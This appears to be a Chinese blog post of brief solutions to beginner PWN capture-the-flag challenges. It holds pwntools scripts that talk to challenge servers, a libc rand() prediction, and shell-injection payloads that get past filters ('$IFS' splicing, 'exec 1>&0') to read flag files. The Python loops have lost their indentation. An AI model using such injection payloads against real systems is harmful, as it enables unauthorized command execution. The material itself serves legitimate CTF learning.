PWN入门-入门泛做题

[LitCTF 2023]只需要nc一下~

Dockerfile

[NISACTF 2022]ReorPwn?

略。

[HNCTF 2022 Week1]easync

略。

[SWPUCTF 2022 新生赛]Does your nc work?

略。

[HGAME 2023 week1]test_nc

略。

[GDOUCTF 2023]EASY PWN

应该是ret2text,但是题出的有问题…

[LitCTF 2023]口算题卡

1
2
3
4
5
6
7
8
9
from pwn import *
context(log_level='debug')
p=remote("node4.anna.nssctf.cn",28864)
for i in range(0,100):
p.recvuntil("What is ")
line_get=p.recvline().strip().strip(b'?').decode()
ans=str(eval(line_get)).encode()
p.sendline(ans)
p.interactive()

[HUBUCTF 2022 新生赛]singout

1
a=g;tac$IFS$9fla$a.txt

[HNCTF 2022 Week1]ezcmp

1
2
3
4
5
6
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
p=remote("node5.anna.nssctf.cn",28511)
payload1=flat([0x144678aadc0e4072,0x84b6e81a4c7eb0e2,0xf426588abcee2052,0x0000c8cb2c5e90c2])
p.sendline(payload1)
p.interactive()

[GDOUCTF 2023]真男人下120层

1
2
3
4
5
6
7
8
9
10
11
12
from pwn import *
from ctypes import *
context(log_level='debug',os='linux',arch='amd64')
ctype=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
ctype.srand(int(ctype.time()))
ctype.srand(ctype.rand()%3-1522127470)
p=remote("node4.anna.nssctf.cn",28273)
for i in range(120):
p.recvuntil("Floor")
payload1=str(ctype.rand()%4+1)
p.sendline(payload1)
p.interactive()

[FSCTF 2023]nc

1
exec 1>&0;tac fla*

[MoeCTF 2022]shell

略。